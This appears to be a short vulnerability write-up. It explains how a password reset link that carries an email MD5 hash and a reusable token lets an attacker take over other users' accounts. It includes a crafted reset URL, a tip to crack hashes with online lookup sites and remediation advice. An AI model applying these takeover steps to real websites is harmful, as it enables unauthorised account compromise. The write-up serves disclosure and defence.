Using this vulnerability the attacker can modify the email md5 hash to any victims email md5 hash to change their password and in this way he can also reset all passwords of all the accounts and can successfully compromise the victims account as the password reset link sent to the user includes the email address md5 hash and also the password reset token can be used for other users.
There was a precondition that an attacker shall now the victims email id md5 hash value.
Attackers Email ID: firstname.lastname@example.org and his password reset link:
The 1st part in the password reset Url before '/' is password reset token and the second part is the md5 hash of the users email id in which the 1st 28 values (74q55426l4q5u5m5c4s5l5m5n5t2) are same for each users email ids and the remaining last values were different for each users email id as they were the users email id md5 hash value. So, the attacker can decrypt the email hash values easily using the online available md5 encrypters and decrypters like: http://md5decryption.com also sometimes some websites use base 64 encoding(or other encodings) which can also be easily decrypted using the online available base64 encoders and decoders like: http://ostermiller.org/calc/encode.html.
Attackers Email ID: email@example.com md5 hash value:
1st 28 values which is same for each users email id hash:
Crafted Url to Reset the password of the Victims Email ID(i.e account)firstname.lastname@example.org:
password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l4 54h464m474/74q55426l4q5u5m5c4s5l5m5n5t205ebb8fb6ec39f50d33e19 cd5719084d
So in this way the attacker can Takeover on any users account.
Input from the user should be treated as untrusted and re-validated when sent to the server. The recommended approach is to generate a onetime token which is linked to the user account, this can be passed with the onetime random token instead of the email ID hash value and expired once the password has been reset. Additionally, ensure if the identifier is not passed that this wonít default to updating all accounts.
So in this way one can Takeover on the victims accounts using the Password Reset Functionality, Token & Link also this way can be used to find same type of vulnerabilities on different websites.
Suggestions and Feedbacks are welcome.